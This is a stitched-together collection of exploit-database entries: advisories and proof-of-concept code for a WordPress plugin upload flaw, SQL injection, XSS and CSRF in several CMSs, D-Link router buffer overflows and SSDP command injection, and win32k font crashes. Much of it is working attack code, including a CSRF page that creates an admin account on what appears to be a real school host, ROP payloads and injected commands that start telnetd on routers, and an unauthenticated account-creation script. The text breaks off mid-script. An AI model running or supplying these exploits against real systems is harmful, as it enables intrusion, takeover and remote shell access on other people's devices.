The plugin workflow that could allow a malicious user to exploit this misbehavior is as follows:
1. Upon initialization of the plugin (anytime if it is activated) an instance of `XooUserUser` class is created
2. In the constructor of `XooUserUser` class a check for POST variable `uultra-form-cvs-form-conf` is taking place
file `wp-content/plugins/users-ultra/xooclasses/xoo.userultra.user.php` lines 19-23
```php
if (isset($_POST['uultra-form-cvs-form-conf']))
{
/* Let's Update the Profile */
$this->process_cvs($_FILES);
}
```
3. Assuming the POST variable `uultra-form-cvs-form-conf` has been set in the request, the method `XooUserUser::process_cvs()` is called.
4. `XooUserUser::process_cvs()` method process every file in $_FILES super-global by only making a check if the file has a `csv` extension
In addition we mark the following points:
1. A malicious user can create and activate user accounts by exploiting this vulnerability if `$_POST["uultra-activate-account"]` is set to `active`
2. A welcome email is send if `$_POST["uultra-send-welcome-email"]` is set to 1
3. The csv files uploaded to the server are stored in a directory (`wp-content/usersultramedia/import` by default) accessible by anyone
4. Any additional columns present in the csv file are stored in `usermeta`
5. No sanitization for values in csv file can easily lead to a Persistent XSS attack, so an attacker can compromise the whole site
PoC
================================================================================
The following Python3 script forms a csv file and uploads it to a site
```python3
#!/usr/bin/python3
import requests
import csv
import tempfile
url = 'http://example.com/'
postData = {
'uultra-form-cvs-form-conf': 1,
'uultra-send-welcome-email': 1,
'uultra-activate-account': 'pending'
}
csvFileHeader = ['user name', 'email', 'display name', 'registration date', 'first name', 'last name', 'age', 'country']
csvFileRow = ['userName', 'email@example.com', 'User Name', '1/1/1', 'User', 'Name', '100', 'IO']
csvFile = tempfile.NamedTemporaryFile(mode='a+t', suffix='.csv')
wr = csv.writer(csvFile, quoting=csv.QUOTE_ALL, delimiter=',')
wr.writerow(csvFileHeader)
wr.writerow(csvFileRow)
csvFile.seek(0)
files = {'file.csv': csvFile}
r = requests.post(url, data=postData, files=files)
exit(0)
```
Timeline
================================================================================
2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form in his website
2015/11/13 - Vendor notified via support forums at wordpress.org
2015/11/14 - Vendor responded and received report through email
2015/11/15 - Vendor responded
2015/11/15 - Patch released
Solution
================================================================================
Update to version 1.5.59
source: https://www.securityfocus.com/bid/62186/info
Flo CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/blog/index.asp?archivem='
source: https://www.securityfocus.com/bid/62146/info
dBlog CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/dblog/storico.asp?m=[Sql Injection]
source: https://www.securityfocus.com/bid/62112/info
pwStore is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the application, denying service to legitimate users.
pwStore 2010.8.30.0 is vulnerable; other versions may also be affected.
#!/usr/bin/env python
from sulley import *
import sys
import time
s_initialize("HTTP")
s_static("GET / HTTP/1.1\r\n")
s_static("Host")
s_static(":\x0d\x0a")
s_static(" ")
s_string("192.168.1.39")
s_static("\r\n")
s_static("\r\n")
print "Instantiating session"
sess = sessions.session(session_filename="https_pwstore.session", proto="ssl", sleep_time=0.50)
print "Instantiating target"
target = sessions.target("192.168.1.39", 443)
#target.procmon = pedrpc.client("127.0.0.1", 26002)
#target.netmon = pedrpc.client("127.0.0.1", 26001)
target.procmon_options = {
"proc_name" : "savant.exe",
"stop_commands" : ['wmic process where (name="savant.exe") delete"'],
"start_commands" : ['C:\\savant\\savant.exe'],
}
print "Adding target"
sess.add_target(target)
print "Building graph"
sess.connect(s_get("HTTP"))
print "Starting fuzzing now"
sess.fuzz()
source: https://www.securityfocus.com/bid/62063/info
Xibo is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user; other attacks are also possible.
Xibo 1.4.2 is vulnerable; other versions may also be affected.
POST: /index.php?p=layout&q=add&ajax=true
Data: layoutid=0&layout=Gimppy%3Cimg+src%3D42+onerror%3D'alert(%22InfoSec42%22)'%3E&description=%3Ciframe+src%3D'http%3A%2F%2Fsecurityevaluators.com'+width%3D1000+height%3D1000%3C%2Fiframe%3E&tags=&templateid=0
source: https://www.securityfocus.com/bid/62061/info
appRain CMF is prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
appRain CMF 3.0.2 is vulnerable; other versions may also be affected.
<img src="http://www.example.com//appRain-v-3.0.2/common/delete_row/Admin/[ID]" width="1" height="1">
<html>
<body onload="submitForm()">
<form name="myForm" id="myForm"
action="http://www.example.com/appRain-v-3.0.2/admin/manage/add" method="post">
<input type="hidden" name="data[Admin][f_name]" value="abc">
<input type="hidden" name="data[Admin][l_name]" value="defghi">
<input type="hidden" name="data[Admin][email]" value="y.xvz@gmail.com">
<input type="hidden" name="data[Admin][username]" value="abc">
<input type="hidden" name="data[Admin][password]" value="abc123">
<input type="hidden" name="data[Admin][status]" value="Active">
<input type="hidden" name="data[Admin][description]" value="">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>
source: https://www.securityfocus.com/bid/62064/info
Xibo is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
Xibo 1.4.2 is vulnerable; other versions may also be affected.
<html>
<head>
<title> Xibo - Digital Signage 1.4.2 CSRF Exploit.</title>
<!--
# CSRF Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# Exploited by: Jacob Holcomb - Security Analyst @ Independnet Security Evaluators
# CVE: CSRF - CVE-2013-4889, XSS - CVE-2013-4888
# http://infosec42.blogspot.com
# http://securityevaluators.com
-->
</head>
<body>
<h1>Please wait... </h1>
<script type="text/javascript">
//Add super user
function RF1(){
document.write('<form name="addAdmin" target ="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=user&q=AddUser&ajax=true" method="post">'+
'<input type="hidden" name="userid" value="0">'+
'<input type="hidden" name="username" value="Gimppy">'+
'<input type="hidden" name="password" value="ISE">'+
'<input type="hidden" name="email" value="Gimppy@infosec42.com">'+
'<input type="hidden" name="usertypeid" value="1">'+
'<input type="hidden" name="groupid" value="1">'+
'</form>');
}
//Set XSS Payloads
function RF2(){
document.write('<form name="addXSS" target="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=layout&q=add&ajax=true" method="post">'+
'<input type="hidden" name="layoutid" value="0">'+
'<input type="hidden" name="layout" value="Gimppy<img src=42 onerror='alert(42)'>">'+
'<input type="hidden" name="description" value="<iframe src='http://securityevaluators.com' width=100 height=1000</iframe>">'+
'<input type="hidden" name="tags" value="">'+
'<input type="hidden" name="templateid" value="0">'+
'</form>');
}
function createPage(){
RF1();
RF2();
}
function _addAdmin(){
document.addAdmin.submit();
}
function _addXSS(){
document.addXSS.submit();
}
//Called Functions
createPage()
for (var i = 0; i < 2; i++){
if(i == 0){
window.setTimeout(_addAdmin, 0500);
}
else if(i == 1){
window.setTimeout(_addXSS, 1000);
}
else{
continue;
}
}
</script>
</body>
</html>
source: https://www.securityfocus.com/bid/62036/info
Aloaha PDF Suite is prone to a stack-based buffer-overflow vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely cause denial-of-service conditions.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/62036.zip
source: https://www.securityfocus.com/bid/62024/info
Nmap is prone to an arbitrary file-write vulnerability.
An attacker can exploit this issue to write arbitrary files with the permissions of the user running the nmap client. This will allow the attacker to fully compromise the affected machine.
Nmap 6.25 is vulnerable; other versions may also be affected.
nmap --script domino-enum-passwords -p 80 <evil_host> --script-args domino-enum-passwords.username='patrik karlsson',domino-enum-passwords.password=secret,domino-enum-passwords.idpath='/tmp'
## Advisory Information
Title: DIR-890L/R Buffer overflows in authentication and HNAP functionalities.
Date published: July,17th, 2015
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-890L/R -- AC3200 Ultra Wi-Fi Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. But it works as the buffer overflow happens in a seperate process than web server which does not allow web server to crash and hence attacker wins.
## Details
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
buf = "GET /webfa_authentication.cgi?id="
buf+="A"*408
buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack
buf+="sh;#"+"CCCC"+"DDDD" #R0-R2
buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values
buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address
buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd
buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
#Currently the address of exit function in libraray used as $PC
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220
buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
# Exploit Title: foobar2000 1.3.9 (.pls; .m3u; .m3u8) Local Crash PoC
# Date: 11-15-2015
# Exploit Author: Antonio Z.
# Vendor Homepage: http://www.foobar2000.org/
# Software Link: http://www.foobar2000.org/getfile/036be51abc909653ad44d664f0ce3668/foobar2000_v1.3.9.exe
# Version: 1.3.9
# Tested on: Windows XP SP3, Windows 7 SP1 x86, Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64
import os
evil = '\x41' * 256
pls = '[playlist]\n' + 'NumberOfEntries=1\n' +'File1=http://' + evil + '\n' + 'Title1=\n' + 'Length1=-1\n'
m3u = 'http://' + evil
m3u8 = 'http://' + evil
file = open('Local_Crash_PoC.pls', 'wb')
file.write(pls)
file.close()
file = open('Local_Crash_PoC.m3u', 'wb')
file.write(m3u)
file.close()
file = open('Local_Crash_PoC.m3u8', 'wb')
file.write(m3u8)
file.close()
# Exploit Title: foobar2000 1.3.9 (.asx) Local Crash PoC
# Date: 11-15-2015
# Exploit Author: Antonio Z.
# Vendor Homepage: http://www.foobar2000.org/
# Software Link: http://www.foobar2000.org/getfile/036be51abc909653ad44d664f0ce3668/foobar2000_v1.3.9.exe
# Version: 1.3.9
# Tested on: Windows XP SP3, Windows 7 SP1 x86, Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64
# Instructions: Create playlist.asx:
# <asx version="3.0">
# <title>Example.com Live Stream</title>
#
# <entry>
# <title>Short Announcement to Play Before Main Stream</title>
# <ref href="http://example.com/announcement.wma" />
# <param name="aParameterName" value="aParameterValue" />
# </entry>
#
# <entry>
# <title>Example radio</title>
# <ref href="http://example.com" />
# <author>Example.com</author>
# <copyright>example.com</copyright>
# </entry>
# </asx>
import os
import shutil
evil = 'A' * 256
shutil.copy ('playlist.asx', 'Local_Crash_PoC.asx')
file = open('Local_Crash_PoC.asx','r')
file_data = file.read()
file.close()
file_new_data = file_data.replace('<ref href="http://example.com" />','<ref href="http://' + evil + '" />')
file = open('Local_Crash_PoC.asx','w')
file.write(file_new_data)
file.close()
source: https://www.securityfocus.com/bid/61880/info
Bo-Blog is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers can exploit these issues to execute arbitrary code in the context of the browser, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; other attacks are also possible.
Bo-Blog 2.1.1 is vulnerable; other versions may also be affected.
http://www.example.com//view.php?go=userlist&ordered=1%27 [SQLi]
http://www.example.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E [XSS]
http://www.example.com//view.php?go=userlist&ordered=1&usergroup="/><script>alert(1);</script> [XSS]
Source: https://code.google.com/p/google-security-research/issues/detail?id=507
We have observed a number of Windows kernel crashes in the win32k.sys driver while processing corrupted TTF font files. An example of a crash log excerpt generated after triggering the bug is shown below:
---
DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: fffff900c49ab000, memory referenced
Arg2: 0000000000000001, value 0 = read operation, 1 = write operation
Arg3: fffff96000324c14, if non-zero, the address which referenced memory.
Arg4: 0000000000000000, (reserved)
[...]
FAULTING_IP:
win32k!or_all_N_wide_rotated_need_last+70
fffff960`00324c14 410802 or byte ptr [r10],al
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0xD6
CURRENT_IRQL: 0
TRAP_FRAME: fffff88007531690 -- (.trap 0xfffff88007531690)
.trap 0xfffff88007531690
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=fffff880075318ff rbx=0000000000000000 rcx=0000000000000007
rdx=00000000000000ff rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000324c14 rsp=fffff88007531820 rbp=fffffffffffffff5
r8=00000000ffffffff r9=fffff900c1b48995 r10=fffff900c49ab000
r11=0000000000000007 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
win32k!or_all_N_wide_rotated_need_last+0x70:
fffff960`00324c14 410802 or byte ptr [r10],al ds:0b08:fffff900`c49ab000=??
.trap
Resetting default scope
LAST_CONTROL_TRANSFER: from fffff8000294a017 to fffff800028cd5c0
STACK_TEXT:
fffff880`07531528 fffff800`0294a017 : 00000000`00000050 fffff900`c49ab000 00000000`00000001 fffff880`07531690 : nt!KeBugCheckEx
fffff880`07531530 fffff800`028cb6ee : 00000000`00000001 fffff900`c49ab000 fffff900`c4211000 fffff900`c49ab002 : nt! ?? ::FNODOBFM::`string'+0x4174f
fffff880`07531690 fffff960`00324c14 : 00000000`0000001f fffff960`000b8f1f fffff900`c4ed2f08 00000000`0000001f : nt!KiPageFault+0x16e
fffff880`07531820 fffff960`000b8f1f : fffff900`c4ed2f08 00000000`0000001f 00000000`00000002 00000000`00000007 : win32k!or_all_N_wide_rotated_need_last+0x70
fffff880`07531830 fffff960`000eba0d : 00000000`00000000 fffff880`07532780 00000000`00000000 00000000`0000000a : win32k!draw_nf_ntb_o_to_temp_start+0x10f
fffff880`07531890 fffff960`000c5ab8 : 00000000`00000000 fffff900`c49aad60 fffff900`c4ed2ed0 00000000`00ffffff : win32k!vExpandAndCopyText+0x1c5
fffff880`07531c30 fffff960`00874b4b : fffff900`0000000a fffff880`00000002 fffff900`c4484ca0 fffff880`07532368 : win32k!EngTextOut+0xe54
fffff880`07531fc0 fffff900`0000000a : fffff880`00000002 fffff900`c4484ca0 fffff880`07532368 00000000`00000000 : VBoxDisp+0x4b4b
fffff880`07531fc8 fffff880`00000002 : fffff900`c4484ca0 fffff880`07532368 00000000`00000000 fffff880`07532110 : 0xfffff900`0000000a
fffff880`07531fd0 fffff900`c4484ca0 : fffff880`07532368 00000000`00000000 fffff880`07532110 fffff900`c49b6d58 : 0xfffff880`00000002
fffff880`07531fd8 fffff880`07532368 : 00000000`00000000 fffff880`07532110 fffff900`c49b6d58 fffff900`c49b6de8 : 0xfffff900`c4484ca0
fffff880`07531fe0 00000000`00000000 : fffff880`07532110 fffff900`c49b6d58 fffff900`c49b6de8 fffff900`c49b6c30 : 0xfffff880`07532368
---
While the above is only one example, we have seen the issue manifest itself in a variety of ways: either by crashing while trying to write beyond a pool allocation in the win32k!or_all_4_wide_rotated_need_last, win32k!or_all_N_wide_rotated_need_last, win32k!or_all_N_wide_rotated_no_last or win32k!or_all_N_wide_unrotated functions, or in other locations in the kernel due to system instability caused by pool corruption. In all cases, the crash occurs somewhere below a win32k!EngTextOut function call, i.e. it is triggered while trying to display the glyphs of a malformed TTF on the screen, rather than while loading the font in the system.
We believe the condition to be a pool-based buffer overflow triggered by one of the above win32k.sys functions, with a binary -or- operation being performed on bytes outside a pool allocation. This is also confirmed by the fact that various system bugchecks we have observed are a consequence of the kernel trying to dereference addresses with too many bits set, e.g.:
---
rax=fffff91fc29b4c60 rbx=0000000000000000 rcx=fffff900c4ede320
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000271f6a rsp=fffff880035b8bd0 rbp=fffff880035b9780
r8=000000000000021d r9=fffff900c4edf000 r10=fffff880056253f4
r11=fffff900c4902eb0 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
win32k!PopThreadGuardedObject+0x16:
fffff960`00271f6a 4c8918 mov qword ptr [rax],r11 ds:0030:fffff91f`c29b4c60=????????????????
---
While we have not determined the specific root cause of the vulnerability, the proof-of-concept TTF files triggering the bug were created by taking legitimate fonts and replacing the glyph TrueType programs with ones generated by a dedicated generator. Therefore, the problem is almost certainly caused by some part of the arbitrary TrueType programs.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (typically leading to an immediate crash in one of the aforementioned functions when the overflow takes place), but it is also possible to observe a system crash on a default Windows installation as a consequence of pool corruption and resulting system instability. In order to reproduce the problem with the provided samples, it is necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with several proof-of-concept TTF files, together with corresponding kernel crash logs from Windows 7 64-bit.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38713.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=506
We have encountered a number of Windows kernel crashes in the win32k.sys driver while processing a specific corrupted TTF font file. The cleanest stack trace we have acquired, which might also indicate where the pool corruption takes place and/or the root cause of the vulnerability, is shown below:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: fffff900c4c31000, memory referenced.
Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.
Arg3: fffff96000156a34, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 0000000000000000, (reserved)
[...]
FAULTING_IP:
win32k!memmove+64
fffff960`00156a34 488901 mov qword ptr [rcx],rax
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
CURRENT_IRQL: 0
TRAP_FRAME: fffff880074a0210 -- (.trap 0xfffff880074a0210)
.trap 0xfffff880074a0210
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=fffff47cffffe440 rbx=0000000000000000 rcx=fffff900c4c31000
rdx=000000000141f518 rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000156a34 rsp=fffff880074a03a8 rbp=0000000000000010
r8=0000000000000018 r9=0000000000000001 r10=fffff900c4c211a8
r11=fffff900c4c30ff0 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
win32k!memmove+0x64:
fffff960`00156a34 488901 mov qword ptr [rcx],rax ds:a020:fffff900`c4c31000=????????????????
.trap
Resetting default scope
LAST_CONTROL_TRANSFER: from fffff800028fa017 to fffff8000287d5c0
STACK_TEXT:
fffff880`074a00a8 fffff800`028fa017 : 00000000`00000050 fffff900`c4c31000 00000000`00000001 fffff880`074a0210 : nt!KeBugCheckEx
fffff880`074a00b0 fffff800`0287b6ee : 00000000`00000001 fffff900`c4c31000 fffff880`074a0400 fffff900`c4c30fd8 : nt! ?? ::FNODOBFM::`string'+0x4174f
fffff880`074a0210 fffff960`00156a34 : fffff960`00252e40 fffff900`c4c30f98 00000000`00000003 fffff900`c48f2eb0 : nt!KiPageFault+0x16e
fffff880`074a03a8 fffff960`00252e40 : fffff900`c4c30f98 00000000`00000003 fffff900`c48f2eb0 fffff960`002525dc : win32k!memmove+0x64
fffff880`074a03b0 fffff960`0031d38e : 00000000`000028a6 fffff900`c4c30fd8 00000000`00000000 fffff900`c4c21008 : win32k!EPATHOBJ::bClone+0x138
fffff880`074a0400 fffff960`000f07bb : fffff880`00002640 fffff900`c576aca0 00000000`00002640 fffff880`00000641 : win32k!RFONTOBJ::bInsertMetricsPlusPath+0x17e
fffff880`074a0540 fffff960`000eccf7 : fffff880`074a2640 fffff880`074a0a68 fffff880`074a0b40 fffff800`00000641 : win32k!xInsertMetricsPlusRFONTOBJ+0xe3
fffff880`074a0610 fffff960`000ec998 : fffff880`074a0b40 fffff880`074a0a68 fffff900`c0480014 00000000`00000179 : win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x1f7
fffff880`074a0690 fffff960`000ec390 : fffff980`00000000 fffff880`074a0830 fffff900`c04a8000 fffff800`00000008 : win32k!ESTROBJ::vCharPos_H3+0x168
fffff880`074a0710 fffff960`000ed841 : 00000000`41800000 00000000`00000000 00000000`0000000a fffff880`074a0830 : win32k!ESTROBJ::vInit+0x350
fffff880`074a07a0 fffff960`000ed4ef : fffff880`074a0ca0 fffff900`c576aca0 ffffd08c`00000020 ffffffff`ffffffff : win32k!GreGetTextExtentExW+0x275
fffff880`074a0a60 fffff800`0287c853 : 00000000`00000000 fffff880`074a0ca0 00000000`00000001 fffff880`00000000 : win32k!NtGdiGetTextExtentExW+0x237
fffff880`074a0bb0 00000000`750a213a : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x13
00000000`0025e1c8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x750a213a
---
We have also observed a number of other system bugchecks caused by the particular TTF file with various stack traces indicating a pool corruption condition. For example, on Windows 7 32-bit a crash occurs only while deleting the font, under the following call stack:
---
9823bc7c 90d8dec1 fb634cf0 fb60ecf0 00000001 win32k!RFONTOBJ::vDeleteCache+0x56
9823bca8 90d14209 00000000 00000000 00000001 win32k!RFONTOBJ::vDeleteRFONT+0x190
9823bcd0 90d15e00 9823bcf4 fb62ccf0 00000000 win32k!PUBLIC_PFTOBJ::bLoadFonts+0x6fb
9823bd00 90ddf48e 00000008 fbc16ff8 912f8fc8 win32k!PFTOBJ::bUnloadWorkhorse+0x114
9823bd28 8267ea06 13000117 0040fa24 775e71b4 win32k!GreRemoveFontMemResourceEx+0x60
9823bd28 775e71b4 13000117 0040fa24 775e71b4 nt!KiSystemServicePostCall
---
While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "OS/2" table.
The issue reproduces on Windows 7 (32 and 64-bit). It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it it also possible to observe a system crash on a default Windows installation as a consequence of pool corruption and resulting system instability. In order to reproduce the problem with the provided sample, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with the proof-of-concept mutated TTF file, together with the original font used to generate it and a corresponding kernel crash log from Windows 7 64-bit.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38714.zip
## Advisory Information
Title: SSDP command injection using UDP for a lot of Dlink routers including DIR-815, DIR-850L
Vendors contacted: William Brown <william.brown@dlink.com> (Dlink)
Release mode: Released
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
Many Dlink routers affected. Tested on DIR-815.
## Vulnerabilities Summary
DIR-815,850L and most of Dlink routers are susceptible to this flaw. This allows to perform command injection using SSDP packets and on UDP. So no authentication required. Just the fact that the attacker needs to be on wireless LAN or be able to fake a request coming from internal wireless LAN using some other mechanism.
## Details
# Command injection
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# This vulnerability is pretty much in every router that has cgibin and uses SSDP code in that cgibin. This one worked on the device dir-815. Will work only in WLAN
buf = 'M-SEARCH * HTTP/1.1\r\nHOST:239.255.255.250:1900\r\nST:urn:schemas-upnp-org:service:WANIPConnection:1;telnetd -p 9094;ls\r\nMX:2\r\nMAN:"ssdp:discover"\r\n\r\n'
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("239.255.255.250", 1900))
s.send(buf)
s.close()
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* Jan 22, 2015: Vulnerability found by Samuel Huntley by William Brown.
* Feb 15, 2015: Vulnerability is patched by Dlink
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
## Advisory Information
Title: DIR-866L Buffer overflows in HNAP and send email functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR866L -- AC1750 Wi-Fi Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 2 security issue in DIR866L firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilities in hnap and send email functionalities. An attacker needs to be on wireless LAN or management interface needs to be exposed on Internet to exploit HNAP vulnerability but it requires no authentication. The send email buffer overflow does require the attacker to be on wireless LAN or requires to trick administrator to exploit using XSRF.
## Details
HNAP buffer overflow
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
import string
import sys
BUFFER_SIZE = 2048
# Observe this in a emulator/debugger or real device/debugger
buf = "POST /hnap.cgi HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 13\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\nHNAP_AUTH: test\r\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
buf+="FFFF"
buf+=struct.pack(">I",0x2abfc9f4) # s0 ROP 2 which loads S2 with sleep address
